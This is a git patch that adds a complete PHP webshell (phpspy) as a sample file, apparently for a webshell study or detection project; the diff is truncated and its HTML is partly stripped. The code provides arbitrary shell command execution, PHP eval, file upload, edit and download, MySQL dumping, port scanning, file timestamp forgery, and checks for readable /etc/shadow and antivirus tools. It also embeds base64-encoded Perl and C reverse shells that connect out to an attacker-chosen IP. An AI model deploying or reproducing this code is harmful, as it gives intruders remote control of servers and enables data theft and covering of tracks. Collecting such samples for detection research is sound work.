From ea6aff6e4ff8036161d372ef7e1484cb533aad8f Mon Sep 17 00:00:00 2001
From: v1ll4n
Date: Fri, 5 Jul 2024 15:27:15 +0800
Subject: [PATCH] add phpspy as demo

---
 php-webshell/sample/phpspy.php | 1610 ++++++++++++++++++++++++++++++++
 1 file changed, 1610 insertions(+)
 create mode 100644 php-webshell/sample/phpspy.php

diff --git a/php-webshell/sample/phpspy.php b/php-webshell/sample/phpspy.php
new file mode 100644
index 0000000..5522493
--- /dev/null
+++ b/php-webshell/sample/phpspy.php
@@ -0,0 +1,1610 @@
+ 'big5',
+ 'cp-866' => 'cp866',
+ 'euc-jp' => 'ujis',
+ 'euc-kr' => 'euckr',
+ 'gbk' => 'gbk',
+ 'iso-8859-1' => 'latin1',
+ 'koi8-r' => 'koi8r',
+ 'koi8-u' => 'koi8u',
+ 'utf-8' => 'utf8',
+ 'windows-1252' => 'latin1',
+);
+
+$act = isset($P['act']) ? $P['act'] : '';
+$charset = isset($P['charset']) ? $P['charset'] : 'gbk';
+$doing = isset($P['doing']) ? $P['doing'] : '';
+
+for ($i=1;$i<=4;$i++) {
+ ${'p'.$i} = isset($P['p'.$i]) ? $P['p'.$i] : '';
+}
+
+if (isset($charsetdb[$charset])) {
+ header("content-Type: text/html; charset=".$charset);
+}
+
+$timestamp = time();
+
+/* 身份验证 */
+if ($act == "logout") {
+ scookie('loginpass', '', -86400 * 365);
+ @header('Location: '.SELF);
+ exit;
+}
+if($pass) {
+ if ($act == 'login') {
+ if ($pass == encode_pass($P['password'])) {
+ scookie('loginpass',encode_pass($P['password']));
+ @header('Location: '.SELF);
+ exit;
+ }
+ }
+ if (isset($_COOKIE['loginpass'])) {
+ if ($_COOKIE['loginpass'] != $pass) {
+ loginpage();
+ }
+ } else {
+ loginpage();
+ }
+}
+/* 验证结束 */
+
+$errmsg = '';
+$uchar = '▲';
+$dchar = '▼';
+!$act && $act = 'file';
+
+//当前目录/设置工作目录/网站根目录
+$home_cwd = getcwd();
+if (isset($P['cwd']) && $P['cwd']) {
+ chdir($P['cwd']);
+} else {
+ chdir(SA_ROOT);
+}
+$cwd = getcwd();
+$web_cwd = $_SERVER['DOCUMENT_ROOT'];
+foreach (array('web_cwd','cwd','home_cwd') as $k) {
+ if (IS_WIN) {
+ $$k = str_replace('\\', '/', $$k);
+ }
+ if (substr($$k, -1) != '/') {
+ $$k = $$k.'/';
+ }
+}
+
+// 查看PHPINFO
+if ($act == 'phpinfo') {
+ if (IS_PHPINFO) {
+ phpinfo();
+ exit;
+ } else {
+ $errmsg = 'phpinfo() function has disabled';
+ }
+}
+
+if(!function_exists('scandir')) {
+ function scandir($cwd) {
+ $files = array();
+ $dh = opendir($cwd);
+ while ($file = readdir($dh)) {
+ $files[] = $file;
+ }
+ return $files ? 
$files : 0; + } +} + +if ($act == 'down') { + if (is_file($p1) && is_readable($p1)) { + @ob_end_clean(); + $fileinfo = pathinfo($p1); + if (function_exists('mime_content_type')) { + $type = @mime_content_type($p1); + header("Content-Type: ".$type); + } else { + header('Content-type: application/x-'.$fileinfo['extension']); + } + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.sprintf("%u", @filesize($p1))); + @readfile($p1); + exit; + } else { + $errmsg = 'Can\'t read file'; + $act = 'file'; + } +} +?> + + + + <?php echo $act.' - '.$_SERVER['HTTP_HOST'];?> + + + + + 'opform')); + makehide('act', $act); + makehide('cwd', $cwd); + makehide('p1', $p1); + makehide('p2', $p2); + makehide('p3', $p3); + makehide('p4', $p4); + makehide('charset', $charset); + formfoot(); + + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $uid = $uid['uid']; + $user = $uid['name']; + $gid = $gid['gid']; + $group = $gid['name']; + } + ?> + + + + + + + +
/ User: ()
+ Charset: + 'charset','option'=>$charsetdb,'selected'=>$charset,'onchange'=>'g(null,null,null,null,null,null,this.value);')); + ?> + + Logout | + File Manager | + MYSQL Manager | + Execute Command | + PHP Variable | + Port Scan | + Security information | + Eval PHP Code + | Back Connect +
+ '); + + $sort = array('filename', 1); + if($p1) { + if(preg_match('!s_([A-z_]+)_(\d{1})!', $p1, $match)) { + $sort = array($match[1], (int)$match[2]); + } + } + + formhead(array('name'=>'flist')); + makehide('act','file'); + makehide('p1',''); + makehide('cwd',$cwd); + makehide('charset',$charset); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + //查看所有可写文件和目录 + $dirdata=$filedata=array(); + + if ($p4 == 'dir') { + $dirdata = GetWDirList($cwd); + $filedata = array(); + } else { + // 默认目录列表 + $dirs = @scandir($cwd); + if ($dirs) { + $dirs = array_diff($dirs, array('.')); + foreach ($dirs as $file) { + $filepath=$cwd.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['chmod']=getChmod($filepath); + $dirdb['perm']=PermsColor($filepath); + $dirdb['owner']=getUser($filepath); + $dirdb['link']=$filepath; + if ($file=='..') { + $dirdata['up']=1; + } else { + $dirdata[]=$dirdb; + } + } else { + $filedb['filename']=$file; + //$filedb['size']=@filesize($filepath); + $filedb['size']=sprintf("%u", @filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['chmod']=getChmod($filepath); + $filedb['perm']=PermsColor($filepath); + $filedb['owner']=getUser($filepath); + $filedb['link']=$filepath; + $filedata[]=$filedb; + } + } + unset($dirdb); + unset($filedb); + } + } + $dir_i = '0'; + if (isset($dirdata['up'])) { + $thisbg = bg(); + p(''); + p(''); + p(''); + } + unset($dirdata['up']); + usort($dirdata, 'cmp'); + usort($filedata, 'cmp'); + foreach($dirdata as $key => $dirdb){ + if($p1 == 'getsize' && $p2 == $dirdb['filename']) { + $attachsize = dirsize($p2); + $attachsize = is_numeric($attachsize) ? 
sizecount($attachsize) : 'Unknown'; + } else { + $attachsize = 'Stat'; + } + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } + + p(''); + $file_i = '0'; + + foreach($filedata as $key => $filedb){ + $fileurl = '/'.str_replace($web_cwd,'',$filedb['link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + p(''); + p('
+ $('opform').p1.value='';$('opform').p2.value='';"; + } + //操作完毕 + $free = @disk_free_space($cwd); + !$free && $free = 0; + $all = @disk_total_space($cwd); + !$all && $all = 0; + $used = $all-$free; + p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

'); + + $cwd_links = ''; + $path = explode('/', $cwd); + $n=count($path); + for($i=0;$i<$n-1;$i++) { + $cwd_links .= ''.$path[$i].'/'; + } + + ?> + +
+
+ + + + + +
()
+ + + + + + + +
+ '); + foreach( range('A','Z') as $drive ) { + if (is_dir($drive.':/')) { + p($comma.''.$drive.':\'); + $comma = '|'; + } + } + p('
'); + } + ?> + + '); + p('
'); + p('
'); + p('WebRoot'); + p(' | ScriptPath'); + p(' | View Writable Directory '); + p(' | Create Directory | Create File'); + p('
Filename '.($p1 == 's_filename_0' ? $dchar : '').($p1 == 's_filename_1' || !$p1 ? $uchar : '').'Last modified '.($p1 == 's_mtime_0' ? $dchar : '').($p1 == 's_mtime_1' ? $uchar : '').'Size '.($p1 == 's_size_0' ? $dchar : '').($p1 == 's_size_1' ? $uchar : '').'Chmod / PermsAction
-Parent Directory
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.''); + p(''.$dirdb['chmod'].' / '); + p(''.$dirdb['perm'].''.$dirdb['owner'].'Rename
'.((strpos($filedb['link'], $web_cwd) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.sizecount($filedb['size']).''); + p(''.$filedb['chmod'].' / '); + p(''.$filedb['perm'].''.$filedb['owner'].''); + p('Down | '); + p('Edit | '); + p('Rename'); + p('
Delete | Copy | Move'.(isset($_SESSION['do']) && @count($_SESSION['dl']) ? ' | Paste' : '').''.$dir_i.' directories / '.$file_i.' files
'); + }// end dir + + elseif ($act == 'mysqladmin') { + $order = isset($P['order']) ? $P['order'] : ''; + $dbhost = isset($P['dbhost']) ? $P['dbhost'] : ''; + $dbuser = isset($P['dbuser']) ? $P['dbuser'] : ''; + $dbpass = isset($P['dbpass']) ? $P['dbpass'] : ''; + $dbname = isset($P['dbname']) ? $P['dbname'] : ''; + $tablename = isset($P['tablename']) ? $P['tablename'] : ''; + + if ($doing == 'dump') { + if (isset($P['bak_table']) && $P['bak_table']) { + $DB = new DB_MySQL; + $DB->charsetdb = $charsetdb; + $DB->charset = $charset; + $DB->connect($dbhost, $dbuser, $dbpass, $dbname); + if ($P['saveasfile'] && $P['bak_path']) { + $fp = @fopen($P['bak_path'],'w'); + if ($fp) { + foreach($P['bak_table'] as $k => $v) { + if ($v) { + $DB->sqldump($v, $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$P['bak_path']); + m('Database has backup to '.$P['bak_path'].''); + } else { + m('Backup failed'); + } + } else { + @ob_end_clean(); + $filename = basename($dbname.'.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + foreach($P['bak_table'] as $k => $v) { + if ($v) { + $DB->sqldump($v); + } + } + exit; + } + $DB->close(); + } else { + m('Please choose the table'); + } + $doing = ''; + } + + formhead(array('title'=>'MYSQL Manager', 'name'=>'dbform')); + makehide('act','mysqladmin'); + makehide('doing',$doing); + makehide('charset', $charset); + makehide('tablename', $tablename); + makehide('order', $order); + p('

'); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + makeinput(array('value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

'); + + if ($dbhost && $dbuser && isset($dbpass)) { + + // 初始化数据库类 + $DB = new DB_MySQL; + $DB->charsetdb = $charsetdb; + $DB->charset = $charset; + $DB->connect($dbhost, $dbuser, $dbpass, $dbname); + + //获取数据库信息 + p('

MySQL '.$DB->version().' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); + $highver = $DB->version() > '4.1' ? 1 : 0; + + //获取数据库 + $query = $DB->query("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = $DB->fetch($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('name'=>'dbname','option'=>$dbs,'selected'=>$dbname,'onchange'=>'setdb(this.options[this.selectedIndex].value)')); + + if ($dbname) { + p('

Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Structure ]'); + } + p('

'); + + $sql_query = isset($P['sql_query']) ? $P['sql_query'] : ''; + + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename LIMIT 0, 30"; + } + if ($tablename && $doing == 'structure') { + $sql_query = "SHOW FULL COLUMNS FROM $tablename;\n"; + $sql_query .= "SHOW INDEX FROM $tablename;"; + } + p('

Run SQL query/queries on database '.$dbname.':

'); + if ($sql_query) { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); + switch($DB->query_res($query)) + { + case 0: + p('

'.$DB->halt('Error').'

'); + break; + case 1: + $result = $DB->query($query); + $tatol = $DB->num_rows($result); + p(''); + p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + p(''); + } + p(''); + + if (!$tatol) { + p(''); + } else { + while($mn = $DB->fetch($result)){ + $thisbg = bg(); + p(''); + //读取记录用 + foreach($mn as $key=>$inside){ + p(''); + } + p(''); + unset($b1); + } + } + p('
'.@mysql_field_name($result, $i).'
No records
'.(($inside == null) ? 'null' : html_clean($inside)).'
'); + break; + case 2: + p('

Affected Rows : '.$DB->affected_rows().'

'); + break; + } + } + } + } else { + $query = $DB->query("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = $DB->fetch($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + if (count($tabledb)) { + if ($highver) { + $db_engine = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'storage_engine';")); + $db_collation = $DB->fetch($DB->query("SHOW VARIABLES LIKE 'collation_database';")); + } + $sort = array('Name', 1); + if($order) { + if(preg_match('!s_([A-z_]+)_(\d{1})!', $order, $match)) { + $sort = array($match[1], (int)$match[2]); + } + } + usort($tabledb, 'cmp'); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + p(""); + p("
Name '.($order == 's_Name_0' ? $dchar : '').($order == 's_Name_1' || !$order ? $uchar : '').'Rows'.($order == 's_Rows_0' ? $dchar : '').($order == 's_Rows_1' ? $uchar : '').'Data_length'.($order == 's_Data_length_0' ? $dchar : '').($order == 's_Data_length_1' ? $uchar : '').'Create_time'.($order == 's_Create_time_0' ? $dchar : '').($order == 's_Create_time_1' ? $uchar : '').'Update_time'.($order == 's_Update_time_0' ? $dchar : '').($order == 's_Update_time_1' ? $uchar : '').'EngineCollationOther
'.$table['Name'].''.$table['Rows'].' '.sizecount($table['Data_length']).''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Structure
 '.$table_num.' table(s)'.$table_rows.''.$data_size.'  '.$db_engine['Value'].''.$db_collation['Value'].' 
Save as file
"); + } else { + p('

No tables

'); + } + $DB->free_result($query); + } + } + $DB->close(); + } + formfoot(); + }//end mysql + + elseif ($act == 'backconnect') { + + !$p2 && $p2 = $_SERVER['REMOTE_ADDR']; + !$p3 && $p3 = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". 
+ "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($p1 == 'start' && $p2 && $p3 && $p4){ + if ($p4 == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc ".$p2." ".$p3." &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc ".$p2." ".$p3." &"); + } + m('Now script try connect to '.$p2.':'.$p3.' ...'); + } + + formhead(array('title'=>'Back Connect', 'onsubmit'=>'g(\'backconnect\',null,\'start\',this.p2.value,this.p3.value,this.p4.value);return false;')); + p('

'); + p('Your IP:'); + makeinput(array('name'=>'p2','size'=>20,'value'=>$p2)); + p('Your Port:'); + makeinput(array('name'=>'p3','size'=>15,'value'=>$p3)); + p('Use:'); + makeselect(array('name'=>'p4','option'=>$usedb,'selected'=>$p4)); + makeinput(array('value'=>'Start','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + }//end + + elseif ($act == 'portscan') { + !$p2 && $p2 = '127.0.0.1'; + !$p3 && $p3 = '21,80,135,139,445,1433,3306,3389,5631,43958'; + formhead(array('title'=>'Port Scan', 'onsubmit'=>'g(\'portscan\',null,\'start\',this.p2.value,this.p3.value);return false;')); + p('

'); + p('IP:'); + makeinput(array('name'=>'p2','size'=>20,'value'=>$p2)); + p('Port:'); + makeinput(array('name'=>'p3','size'=>80,'value'=>$p3)); + makeinput(array('value'=>'Scan','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + + if ($p1 == 'start') { + p('

Result »

'); + p(''); + } + } + + elseif ($act == 'eval') { + $phpcode = trim($p1); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code', 'onsubmit'=>'g(\'eval\',null,this.p1.value);return false;')); + maketext(array('title'=>'PHP Code','name'=>'p1', 'value'=>$phpcode)); + p('

Get plugins

'); + formfooter(); + }//end eval + + elseif ($act == 'editfile') { + + // 编辑文件 + if ($p1 == 'edit' && $p2 && $p3) { + $fp = @fopen($p2,'w'); + m('Save file '.(@fwrite($fp,$p3) ? 'success' : 'failed')); + @fclose($fp); + } + $contents = ''; + if(file_exists($p2)) { + $fp=@fopen($p2,'r'); + $contents=@fread($fp, filesize($p2)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File', 'onsubmit'=>'g(\'editfile\',null,\'edit\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Filename','name'=>'p2','value'=>$p2,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'p3','value'=>$contents)); + formfooter(); + goback(); + + }//end editfile + + elseif ($act == 'newtime') { + $filemtime = @filemtime($p1); + + formhead(array('title'=>'Clone folder/file was last modified time', 'onsubmit'=>'g(\'file\',null,\'clonetime\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Alter folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference folder/file','name'=>'p3','value'=>$cwd,'size'=>120,'newline'=>1)); + formfooter(); + + formhead(array('title'=>'Set last modified', 'onsubmit'=>'g(\'file\',null,\'settime\',this.p2.value,this.p3.value);return false;')); + makeinput(array('title'=>'Current folder/file','name'=>'p2','value'=>$p1,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Modify time','name'=>'p3','value'=>date("Y-m-d H:i:s", $filemtime),'size'=>120,'newline'=>1)); + formfooter(); + + goback(); + }//end newtime + + elseif ($act == 'shell') { + formhead(array('title'=>'Execute Command', 'onsubmit'=>'g(\'shell\',null,this.p1.value);return false;')); + p('

'); + makeinput(array('name'=>'p1','value'=>htmlspecialchars($p1))); + makeinput(array('class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

'); + formfoot(); + + if ($p1) { + p('
'.execute($p1).'
'); + } + }//end shell + + elseif ($act == 'phpenv') { + $d=array(); + if(function_exists('mysql_get_client_info')) + $d[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $d[] = "MSSQL"; + if(function_exists('pg_connect')) + $d[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $d[] = "Oracle"; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',(isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'))), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',(getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed')), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',($dis_func ? $dis_func : 'No')), + 24 => array('Supported databases',implode(', ', $d)), + 25 => array('cURL support',function_exists('curl_version') ? 
'Yes' : 'No'), + 26 => array('Open base dir',getcfg('open_basedir')), + 27 => array('Safe mode exec dir',getcfg('safe_mode_exec_dir')), + 28 => array('Safe mode include dir',getcfg('safe_mode_include_dir')), + ); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

'.$hp[$a].' »

'); + p(''); + } + }//end phpenv + + elseif ($act == 'secinfo') { + + if( !IS_WIN ) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no'); + secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no'); + secparam('OS version', @file_get_contents('/proc/version')); + secparam('Distr name', @file_get_contents('/etc/issue.net')); + $safe_mode = @ini_get('safe_mode'); + if(!$GLOBALS['safe_mode']) { + $temp=array(); + foreach ($userful as $item) + if(which($item)){$temp[]=$item;} + secparam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $item) + if(which($item)){$temp[]=$item;} + secparam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $item) + if(which($item)){$temp[]=$item;} + secparam('Downloaders', implode(', ',$temp)); + secparam('Hosts', @file_get_contents('/etc/hosts')); + secparam('HDD space', execute('df -h')); + secparam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + secparam('OS Version',execute('ver')); + secparam('Account Settings',execute('net accounts')); + secparam('User Accounts',execute('net user')); + secparam('IP Configurate',execute('ipconfig -all')); + } + }//end + + else { + m('Undefined Action'); + } + + ?> + +
+ + querycount.' queries'; + } + ?> + + Powered by 2013 final. Copyright (C) 2004-2013 [S4T] All Rights Reserved. +
+ + + +'.$n.' »'); + p('
'); + if(strpos($v, "\n") === false) + p($v.'
'); + else + p('
'.$v.'
'); + p('
'); + } +} +function m($msg) { + echo '
'; + echo $msg; + echo '
'; +} +function s_array($array) { + return is_array($array) ? array_map('s_array', $array) : stripslashes($array); +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; + $key = ($prefix ? $cookiepre : '').$key; + $life = $life ? $life : $cookielife; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport); +} +function loginpage() { + formhead(); + makehide('act','login'); + makeinput(array('name'=>'password','type'=>'password','size'=>'20')); + makeinput(array('type'=>'submit','value'=>'Login')); + formfoot(); + exit; +} +function execute($cfe) { + $res = ''; + if ($cfe) { + if(function_exists('system')) { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif(function_exists('passthru')) { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif(function_exists('shell_exec')) { + $res = @shell_exec($cfe); + } elseif(function_exists('exec')) { + @exec($cfe,$res); + $res = join("\n",$res); + } elseif(@is_resource($f = @popen($cfe,"r"))) { + $res = ''; + while(!@feof($f)) { + $res .= @fread($f,1024); + } + @pclose($f); + } + } + return $res; +} +function which($pr) { + $path = execute("which $pr"); + return ($path ? $path : $pr); +} +function cf($fname,$text){ + if($fp=@fopen($fname,'w')) { + @fputs($fp,@base64_decode($text)); + @fclose($fp); + } +} +function dirsize($cwd) { + $dh = @opendir($cwd); + $size = 0; + while($file = @readdir($dh)) { + if ($file != '.' && $file != '..') { + $path = $cwd.'/'.$file; + $size += @is_dir($path) ? dirsize($path) : sprintf("%u", @filesize($path)); + } + } + @closedir($dh); + return $size; +} +// 页面调试信息 +function debuginfo() { + global $starttime; + $mtime = explode(' ', microtime()); + $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6); + echo 'Processed in '.$totaltime.' 
second(s)'; +} + +// 清除HTML代码 +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// 获取权限 +function getChmod($file){ + return substr(base_convert(@fileperms($file),10,8),-4); +} + +function PermsColor($f) { + if (!is_readable($f)) { + return ''.getPerms($f).''; + } elseif (!is_writable($f)) { + return ''.getPerms($f).''; + } else { + return ''.getPerms($f).''; + } +} +function getPerms($file) { + $mode = @fileperms($file); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 
